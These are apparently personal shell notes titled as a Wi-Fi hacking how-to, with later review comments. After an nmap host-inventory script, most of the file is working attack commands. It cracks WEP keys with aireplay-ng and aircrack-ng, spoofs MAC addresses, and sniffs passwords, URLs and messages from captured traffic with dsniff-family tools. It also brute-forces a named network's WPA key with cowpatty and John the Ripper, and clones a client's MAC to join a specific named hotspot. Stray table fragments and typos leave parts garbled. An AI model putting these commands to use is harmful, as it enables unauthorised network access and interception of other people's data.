wifi-hacking.howto.sh
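##-- repeatedly find hosts --
# Host inventory for IP_RANGE. Each run writes the freshly discovered
# "Host ..." / "MAC ..." line pairs to HOST_LIST_NEW, appends the pairs for
# addresses not yet in HOST_LIST, then re-tags the addresses seen in this run
# with " - IS UP NOW" in HOST_LIST. State files live in the current directory.
# Requires nmap and an interface called eth0; meant to be pasted into a
# terminal (no shebang, no strict mode).
IP_RANGE=172.25.25.0-254
HOST_LIST=HostList
HOST_LIST_NEW=.tmp_hln
TMP_NEWIP=.tmp_newip
touch -- "$HOST_LIST"

# nmap flags kept as the author wrote them. NOTE(review): in current nmap
# -sL is a list scan that sends no probes, so the MAC lines this pipeline
# keeps may never appear — confirm against the nmap version in use.
# grep -B1 keeps the "Host" line preceding each "MAC" line; the second grep
# drops the "--" group separators grep inserts between pairs.
nmap -sL -e eth0 -PI -PT -T2 -PS "$IP_RANGE" \
  | grep -B1 MAC | grep -v -e '--' | sed -e 's/not scanned//' > "$HOST_LIST_NEW"

# Addresses seen this run that HOST_LIST does not know yet. -F makes the dots
# in the address literal and -w stops 10.0.0.1 from matching 10.0.0.10
# (the unquoted, unanchored grep of the original had both problems).
awk '/Host/ {print $2}' "$HOST_LIST_NEW" | while IFS= read -r ip; do
  grep -qFw -- "$ip" "$HOST_LIST" || printf '%s\n' "$ip"
done > "$TMP_NEWIP"

# Append the Host/MAC pair of every new address to the inventory.
while IFS= read -r ip; do
  grep -A1 -Fw -- "$ip" "$HOST_LIST_NEW"
done < "$TMP_NEWIP" >> "$HOST_LIST"

## Mark UP hosts
# Strip last run's tags first; the && keeps HOST_LIST intact if sed fails
# instead of replacing it with an empty file.
sed -e 's/ - IS UP NOW//' -- "$HOST_LIST" > "$HOST_LIST.tmp" \
  && mv -- "$HOST_LIST.tmp" "$HOST_LIST"
# Tag every address seen in this run. Dots are escaped so the sed pattern
# matches the literal address rather than any character.
awk '/Host/ {print $2}' "$HOST_LIST_NEW" | while IFS= read -r ip; do
  esc=${ip//./\\.}
  sed -e "s/$esc/$ip - IS UP NOW/g" -- "$HOST_LIST" > "$HOST_LIST.tmp" \
    && mv -- "$HOST_LIST.tmp" "$HOST_LIST"
done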
--------------------------- | |
# NOTE(review): the --arpreplay / --ivs / aircrack-ng trio is the WEP
# IV-collection sequence; it has no target once WEP is retired in favour of
# WPA2-AES or WPA3, and an ARP-replay burst is the kind of high-rate repeat
# traffic a wireless IDS can be expected to flag. The client MAC given as -h
# here is the same one macchanger sets two lines down.
sudo aireplay-ng -b 00:0B:6B:4D:FD:38 -h 00:4F:62:11:01:25 --arpreplay eth0 | |
sudo airodump-ng --ivs --channel 10 --write kralovice eth0 | |
sudo aircrack-ng eth0 kralovice 11 1 | |
sudo macchanger -m 00:4F:62:11:01:25 eth0 | |
# The dsniff-family tools below read a kismet capture file from disk; only
# traffic that was sent in the clear is readable this way, so the mitigation
# sits on the clients (TLS/SSH/VPN), not on the network.
kismet | |
pmi-driftnet -f /tmp/kismet_dump | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | dsniff -p - | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | msgsnarf -p - | |
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | webspy -p - HOST | |
9:38> qlist dsniff |grep bin <epcim@dontpanic:~/tmp | |
/usr/sbin/dnsspoof | |
/usr/sbin/filesnarf | |
/usr/sbin/macof | |
/usr/sbin/sshow | |
/usr/sbin/tcpkill | |
/usr/sbin/tcpnice | |
/usr/sbin/sshmitm | |
/usr/sbin/dsniff | |
/usr/sbin/webspy | |
/usr/sbin/urlsnarf | |
/usr/sbin/arpspoof | |
/usr/sbin/webmitm | |
/usr/sbin/mailsnarf | |
/usr/sbin/msgsnarf | |
########### | |
Another small problem, tcpreplay doesn't understand 802.11 headers: | |
slax ~ # tcpreplay -i lo dump.cap | |
sending on: lo | |
validate_l2(): Unsupported datalink type: 802.11 (0x69) | |
Not to worry, airdecap-ng can convert the capture to straight ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can | |
also use it just to strip the 802.11 headers: | |
slax ~ # airdecap-ng dump.cap | |
Total number of packets read 256828 | |
Total number of WEP data packets 315 | |
Total number of WPA data packets 0 | |
Number of plaintext data packets 42287 | |
Number of decrypted WEP packets 0 | |
Number of decrypted WPA packets 0 | |
This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the | |
airdecap-ng command. | |
Now we're going to replay the data on the local loopback ethernet interface (lo). This gives us an interface to send the data on without actually | |
sending it out over the air or on the local network. | |
First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each): | |
slax ~ # dsniff -i lo | |
slax ~ # driftnet -i lo | |
slax ~ # urlsnarf -i lo | |
slax ~ # msgsnarf -i lo | |
Then run tcpreplay (the -R option speeds up the replay): | |
slax ~ # tcpreplay -i lo -R dump-dec.cap | |
# PMi | |
# Kismet | |
# Passive capture: kismet_server presumably produces /tmp/kismet_dump, tee
# keeps a copy in /tmp/kismet_dump.tee and feeds the stream to dsniff; the
# tail line then replays the copy into urlsnarf. NOTE(review): as with the
# dsniff lines above, only cleartext protocols are visible here — end-to-end
# encryption on the clients is what removes the exposure.
sudo kismet_server | |
#tee -a /tmp/kismet_dump.tee < /tmp/kismet_dump | |
tee /tmp/kismet_dump.tee < /tmp/kismet_dump | dsniff -p - | |
tail --lines=+1 -f /tmp/kismet_dump.tee | urlsnarf -p - | |
kismet_client | |
# WPA - brute force dict key hack, example for "edward1218" | |
1. locate network with kismet/capture some data (four-way handshake) | |
Alternatively: | |
# sudo airodump-ng --channel 11 --bssid 00:24:B2:8C:8A:BA --write ./airodump-edward-ch11.dump wlan0 | |
2. run dict attack with cowpatty 4.6 | |
# cd ~/tmp/crackers/cowpatty-4.6 | |
# ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f /home/epcim/tmp/crackers/wpalist.txt -s "edward1218" | |
3. try luck | |
# echo edward1218 > tryfirst.john <epcim@adrika-netbk:~/tmp | |
# echo edward >> tryfirst.john | |
# john -session:/tmp/delme -wordlist:tryfirst.john -rules -stdout | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
4. if no success, try John the Ripper | |
# shuffe | |
# john -wordlist:/hg2g/av/wpalist-shuf.txt -rules -session:/tmp/johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
# a-z | |
# john -wordlist:/home/epcim/tmp/crackers/wpalist.txt -rules -session:johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218" | |
# Behave as another client | |
# NOTE(review): this sequence only works because the AP accepts any client
# that presents the expected MAC and associates to the fixed BSSID/ESSID.
# MAC allow-lists and hidden ESSIDs therefore give no protection against it,
# and a wireless IDS may report it as a duplicate client; binding the session
# to a per-user credential (802.1X / WPA-Enterprise) is the control that
# actually closes it. Commands are left exactly as the author wrote them.
export NMAC=00:16:CE:4A:15:7D | |
sudo ifconfig wlan0 down | |
sudo macchanger -m "$NMAC" wlan0 | |
sudo iwconfig wlan0 mode Managed | |
sudo iwconfig wlan0 ap 00:23:69:3A:DC:3A | |
sudo iwconfig wlan0 essid "Zenbu.net.nz - Muri Beach" | |
sudo iwconfig wlan0 channell 1 | |
sudo iwconfig wlan0 frag 256 | |
sudo iwconfig wlan0 retry 3 | |
sudo iwconfig wlan0 txpower 20 | |
sudo ifconfig wlan0 up | |
# Static address assignment follows; the trailing ';' on the inet line is
# harmless but unnecessary.
sudo ifconfig wlan0 inet 10.10.24.89 netmask 255.255.255.0; | |
sudo route set default gw 10.10.24.1 | |